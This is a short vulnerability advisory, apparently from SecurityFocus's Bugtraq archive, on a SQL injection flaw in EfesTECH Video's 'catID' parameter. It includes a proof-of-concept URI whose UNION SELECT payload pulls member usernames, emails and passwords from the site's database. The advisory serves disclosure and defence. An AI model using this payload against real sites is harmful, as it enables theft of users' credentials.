Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

EfesTECH Video 'catID' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/[path]/default.asp?catID=-1%20union%20select%200,kullanici,eposta,3,4,5,sifre,7,8,9,10,11,12,13%20from%20uyeler







 

Privacy Statement
Copyright 2009, SecurityFocus